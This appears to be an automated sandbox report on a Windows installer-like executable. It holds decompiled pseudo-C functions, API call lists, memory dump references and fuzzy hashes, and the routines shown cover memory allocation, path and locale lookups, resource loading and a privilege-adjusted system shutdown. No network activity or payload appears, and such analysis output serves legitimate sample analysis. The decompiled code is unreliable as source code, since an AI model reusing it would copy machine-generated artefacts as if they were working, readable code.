                                                            				intOrPtr _t20;
                                                            				void* _t21;
                                                            
                                                            				_t16 = __eax;
                                                            				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                            				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                            					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                            					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
                                                            					_t20 = _t14;
                                                            					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                            					if(_t20 == 0) {
                                                            						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                            					}
                                                            				}
                                                            				return  *((intOrPtr*)(_t16 + 0x10));
                                                            			}













                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                              • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                              • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                            • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00423ED8(intOrPtr* __eax) {
                                                            				int _t4;
                                                            				intOrPtr* _t7;
                                                            
                                                            				_t7 = __eax;
                                                            				_t4 = SetEndOfFile( *(__eax + 4)); // executed
                                                            				if(_t4 == 0) {
                                                            					return E00423CAC( *_t7);
                                                            				}
                                                            				return _t4;
                                                            			}






                                                            APIs
                                                            • SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF
                                                              • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorFileLast
                                                            • String ID:
                                                            • API String ID: 734332943-0
                                                            • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                            • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040CAA4() {
                                                            				intOrPtr _v16;
                                                            				struct _SYSTEM_INFO* _t3;
                                                            
                                                            				GetSystemInfo(_t3); // executed
                                                            				return _v16;
                                                            			}






                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                            • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00403BCC(signed int __eax) {
                                                            				void* _t4;
                                                            				intOrPtr _t7;
                                                            				signed int _t8;
                                                            				void** _t10;
                                                            				void* _t12;
                                                            				void* _t14;
                                                            
                                                            				_t8 = __eax;
                                                            				E00403B60(__eax);
                                                            				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                            				if(_t4 == 0) {
                                                            					 *0x4bbaf0 = 0;
                                                            					return 0;
                                                            				} else {
                                                            					_t10 =  *0x4bbadc; // 0x4bbad8
                                                            					_t14 = _t4;
                                                            					 *_t14 = 0x4bbad8;
                                                            					 *0x4bbadc = _t4;
                                                            					 *(_t14 + 4) = _t10;
                                                            					 *_t10 = _t4;
                                                            					_t12 = _t14 + 0x13fff0;
                                                            					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                            					 *0x4bbaf0 = 0x13ffe0 - _t8;
                                                            					_t7 = _t12 - _t8;
                                                            					 *0x4bbaec = _t7;
                                                            					 *(_t7 - 4) = _t8 | 0x00000002;
                                                            					return _t7;
                                                            				}
                                                            			}










                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                            • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00403CF6(void* __eax) {
                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                            				void* _v48;
                                                            				void* _t13;
                                                            				int _t20;
                                                            				void* _t22;
                                                            				signed int _t26;
                                                            				signed int _t29;
                                                            				signed int _t30;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            				signed int _t39;
                                                            				void* _t41;
                                                            				void* _t42;
                                                            
                                                            				_push(_t29);
                                                            				_t42 = _t41 + 0xffffffdc;
                                                            				_t34 = __eax - 0x10;
                                                            				E00403C48();
                                                            				_t13 = _t34;
                                                            				 *_t42 =  *_t13;
                                                            				_v48 =  *((intOrPtr*)(_t13 + 4));
                                                            				_t26 =  *(_t13 + 0xc);
                                                            				if((_t26 & 0x00000008) != 0) {
                                                            					_t22 = _t34;
                                                            					_t39 = _t26 & 0xfffffff0;
                                                            					_t30 = 0;
                                                            					while(1) {
                                                            						VirtualQuery(_t22,  &_v44, 0x1c);
                                                            						if(VirtualFree(_t22, 0, 0x8000) == 0) {
                                                            							break;
                                                            						}
                                                            						_t35 = _v44.RegionSize;
                                                            						if(_t39 > _t35) {
                                                            							_t39 = _t39 - _t35;
                                                            							_t22 = _t22 + _t35;
                                                            							continue;
                                                            						}
                                                            						goto L10;
                                                            					}
                                                            					_t30 = _t30 | 0xffffffff;
                                                            				} else {
                                                            					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
                                                            					if(_t20 == 0) {
                                                            						_t30 = _t29 | 0xffffffff;
                                                            					} else {
                                                            						_t30 = 0;
                                                            					}
                                                            				}
                                                            				L10:
                                                            				if(_t30 == 0) {
                                                            					 *_v48 =  *_t42;
                                                            					 *( *_t42 + 4) = _v48;
                                                            				}
                                                            				 *0x4bdb78 = 0;
                                                            				return _t30;
                                                            			}
















                                                            APIs
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Virtual$Free$Query
                                                            • String ID:
                                                            • API String ID: 778034434-0
                                                            • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                            • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            C-Code - Quality: 78%
                                                            			E0040A928(short* __eax, intOrPtr __edx) {
                                                            				short* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				void* _v20;
                                                            				struct _WIN32_FIND_DATAW _v612;
                                                            				short _v1134;
                                                            				signed int _t50;
                                                            				signed int _t51;
                                                            				void* _t55;
                                                            				signed int _t88;
                                                            				signed int _t89;
                                                            				intOrPtr* _t90;
                                                            				signed int _t101;
                                                            				signed int _t102;
                                                            				short* _t112;
                                                            				struct HINSTANCE__* _t113;
                                                            				short* _t115;
                                                            				short* _t116;
                                                            				void* _t117;
                                                            
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				_v16 = _v8;
                                                            				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                            				if(_t113 == 0) {
                                                            					L4:
                                                            					if( *_v8 != 0x5c) {
                                                            						_t115 = _v8 + 4;
                                                            						goto L10;
                                                            					} else {
                                                            						if( *((short*)(_v8 + 2)) == 0x5c) {
                                                            							_t116 = E0040A904(_v8 + 4);
                                                            							if( *_t116 != 0) {
                                                            								_t14 = _t116 + 2; // 0x2
                                                            								_t115 = E0040A904(_t14);
                                                            								if( *_t115 != 0) {
                                                            									L10:
                                                            									_t88 = _t115 - _v8;
                                                            									_t89 = _t88 >> 1;
                                                            									if(_t88 < 0) {
                                                            										asm("adc ebx, 0x0");
                                                            									}
                                                            									_t43 = _t89 + 1;
                                                            									if(_t89 + 1 <= 0x105) {
                                                            										E0040A34C( &_v1134, _v8, _t43);
                                                            										while( *_t115 != 0) {
                                                            											_t112 = E0040A904(_t115 + 2);
                                                            											_t50 = _t112 - _t115;
                                                            											_t51 = _t50 >> 1;
                                                            											if(_t50 < 0) {
                                                            												asm("adc eax, 0x0");
                                                            											}
                                                            											if(_t51 + _t89 + 1 <= 0x105) {
                                                            												_t55 =  &_v1134 + _t89 + _t89;
                                                            												_t101 = _t112 - _t115;
                                                            												_t102 = _t101 >> 1;
                                                            												if(_t101 < 0) {
                                                            													asm("adc edx, 0x0");
                                                            												}
                                                            												E0040A34C(_t55, _t115, _t102 + 1);
                                                            												_v20 = FindFirstFileW( &_v1134,  &_v612);
                                                            												if(_v20 != 0xffffffff) {
                                                            													FindClose(_v20);
                                                            													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                            														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                            														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                            														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                            														_t115 = _t112;
                                                            														continue;
                                                            													}
                                                            												}
                                                            											}
                                                            											goto L24;
                                                            										}
                                                            										E0040A34C(_v8,  &_v1134, _v12);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
                                                            					if(_t90 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_push(0x105);
                                                            						_push( &_v1134);
                                                            						_push(_v8);
                                                            						if( *_t90() == 0) {
                                                            							goto L4;
                                                            						} else {
                                                            							E0040A34C(_v8,  &_v1134, _v12);
                                                            						}
                                                            					}
                                                            				}
                                                            				L24:
                                                            				return _v16;
                                                            			}






















                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                            • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E004AF110() {
                                                            				int _v4;
                                                            				struct _TOKEN_PRIVILEGES _v16;
                                                            				void* _v20;
                                                            				int _t7;
                                                            
                                                            				if(E0041FF2C() != 2) {
                                                            					L5:
                                                            					_t7 = ExitWindowsEx(2, 0);
                                                            					asm("sbb eax, eax");
                                                            					return _t7 + 1;
                                                            				}
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
                                                            					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
                                                            					_v16.PrivilegeCount = 1;
                                                            					_v4 = 2;
                                                            					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
                                                            					if(GetLastError() == 0) {
                                                            						goto L5;
                                                            					}
                                                            					return 0;
                                                            				}
                                                            				return 0;
                                                            			}








                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                            • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF9F0() {
                                                            				struct HRSRC__* _t10;
                                                            				void* _t11;
                                                            				void* _t12;
                                                            
                                                            				_t10 = FindResourceW(0, 0x2b67, 0xa);
                                                            				if(_t10 == 0) {
                                                            					E004AF834();
                                                            				}
                                                            				if(SizeofResource(0, _t10) != 0x2c) {
                                                            					E004AF834();
                                                            				}
                                                            				_t11 = LoadResource(0, _t10);
                                                            				if(_t11 == 0) {
                                                            					E004AF834();
                                                            				}
                                                            				_t12 = LockResource(_t11);
                                                            				if(_t12 == 0) {
                                                            					E004AF834();
                                                            				}
                                                            				return _t12;
                                                            			}







                                                            APIs
                                                            • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                            • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                            • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                            				intOrPtr* _v8;
                                                            				intOrPtr _v12;
                                                            				short _v182;
                                                            				short _v352;
                                                            				char _v356;
                                                            				char _v360;
                                                            				char _v364;
                                                            				int _t58;
                                                            				signed int _t61;
                                                            				intOrPtr _t70;
                                                            				signed short _t80;
                                                            				void* _t83;
                                                            				void* _t85;
                                                            				void* _t86;
                                                            
                                                            				_t77 = __edi;
                                                            				_push(__edi);
                                                            				_v356 = 0;
                                                            				_v360 = 0;
                                                            				_v364 = 0;
                                                            				_v8 = __edx;
                                                            				_t80 = __eax;
                                                            				_push(_t83);
                                                            				_push(0x40a631);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t83 + 0xfffffe98;
                                                            				E00407A20(_v8);
                                                            				_t85 = _t80 -  *0x4b7a08; // 0x404
                                                            				if(_t85 >= 0) {
                                                            					_t86 = _t80 -  *0x4b7c08; // 0x7c68
                                                            					if(_t86 <= 0) {
                                                            						_t77 = 0x40;
                                                            						_v12 = 0;
                                                            						if(0x40 >= _v12) {
                                                            							do {
                                                            								_t61 = _t77 + _v12 >> 1;
                                                            								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
                                                            									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
                                                            									if(__eflags <= 0) {
                                                            										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
                                                            									} else {
                                                            										_v12 = _t61 + 1;
                                                            										goto L8;
                                                            									}
                                                            								} else {
                                                            									_t77 = _t61 - 1;
                                                            									goto L8;
                                                            								}
                                                            								goto L9;
                                                            								L8:
                                                            							} while (_t77 >= _v12);
                                                            						}
                                                            					}
                                                            				}
                                                            				L9:
                                                            				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
                                                            					_t58 = _t80 & 0x0000ffff;
                                                            					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
                                                            					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
                                                            					E0040858C( &_v356, 0x55,  &_v182);
                                                            					_push(_v356);
                                                            					_push(0x40a64c);
                                                            					E0040858C( &_v360, 0x55,  &_v352);
                                                            					_push(_v360);
                                                            					_push(E0040A65C);
                                                            					E0040858C( &_v364, 0x55,  &_v182);
                                                            					_push(_v364);
                                                            					E004087C4(_v8, _t58, 5, _t77, _t80);
                                                            				}
                                                            				_pop(_t70);
                                                            				 *[fs:eax] = _t70;
                                                            				_push(E0040A638);
                                                            				return E00407A80( &_v364, 3);
                                                            			}


















                                                            APIs
                                                            • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                            • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                            • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Locale$Info$Valid
                                                            • String ID:
                                                            • API String ID: 1826331170-0
                                                            • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                            • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                            • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                            • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                            				long _v8;
                                                            				long _v12;
                                                            				long _v16;
                                                            				long _v20;
                                                            				intOrPtr _v24;
                                                            				signed int _v28;
                                                            				WCHAR* _t25;
                                                            				int _t26;
                                                            				intOrPtr _t31;
                                                            				intOrPtr _t34;
                                                            				intOrPtr* _t37;
                                                            				intOrPtr* _t38;
                                                            				intOrPtr _t46;
                                                            				intOrPtr _t48;
                                                            
                                                            				_t25 = _a4;
                                                            				if(_t25 == 0) {
                                                            					_t25 = 0;
                                                            				}
                                                            				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                            				_v28 = _v8 * _v12;
                                                            				_v24 = 0;
                                                            				_t46 = _v24;
                                                            				_t31 = E004095A8(_v28, _t46, _v16, 0);
                                                            				_t37 = _a8;
                                                            				 *_t37 = _t31;
                                                            				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                            				_t48 = _v24;
                                                            				_t34 = E004095A8(_v28, _t48, _v20, 0);
                                                            				_t38 = _a12;
                                                            				 *_t38 = _t34;
                                                            				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                            				return _t26;
                                                            			}


















                                                            APIs
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1705453755-0
                                                            • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                            • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                            • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                            • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                            				short _v516;
                                                            				void* __ebp;
                                                            				int _t5;
                                                            				intOrPtr _t10;
                                                            				void* _t18;
                                                            
                                                            				_t18 = __ecx;
                                                            				_t10 = _a4;
                                                            				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
                                                            				_t19 = _t5;
                                                            				if(_t5 <= 0) {
